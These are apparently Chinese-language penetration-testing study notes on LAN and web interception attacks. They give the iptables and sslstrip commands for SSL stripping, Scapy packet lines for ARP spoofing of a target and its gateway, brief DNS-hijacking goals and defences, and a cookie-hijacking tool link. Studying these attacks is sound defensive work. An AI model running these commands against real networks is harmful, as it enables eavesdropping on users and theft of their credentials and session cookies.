SSL
检查外网网站是否安装SSL协议以及SSV版本 wosign.ssllabs.com
SSL密码嗅探 sslstrip "# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000"
DNS劫持
目的 钓鱼/广告植入/DOS
防御
准备备用域名/手动修改DNS/手动修改路由器密码
ARP欺骗
原理 IP->被攻击者IP mac->攻击者mac / 使局域网中指定的/全部 目标机器数据包-通过攻击者主机转发
类型-多数情况下都是同时使用
主机型
网关型
目的 数据监听/敏感信息获取/重放攻击/篡改/钓鱼/结合DNS欺骗进一步渗透
Kali/攻击 ip:192.168.1.102/ MAC:00:0c:29:6e:98:a6
Windows/目标 IP:192.168.1.18
Getway IP:192.168.1.1
"pkt = Ether(src=[1.102的MAC], dst=[1.18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1.18MAC, pdst=1.18IP地址, op=2) 或者
pkt = Ether(src=[1.102的MAC], dst=[1. 18的Mac]) / ARP(1.102的MAC, 网关IP地址, hwdst=1. 18MAC, pdst=1. 18IP地址, op=1)" 1. 18发往网关的数据包都会被发往1.102。
"pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC,pdst=网关IP地址, op=2)
或者pkt = Ether(src=[1.102的MAC], dst=[网关的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=网关MAC, pdst=网关IP地址, op=1)" 网关发往1.18的数据包都发送到Kali Linux(1.102)上
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2) 广播欺骗
drifnet 欺骗成功后利用工具/FILTER和REPLACE数据构造
Cookie劫持
Cookie-Injecting-Tools 谷歌扩展工具/https://github.com/lfzark/cookie-injecting-tools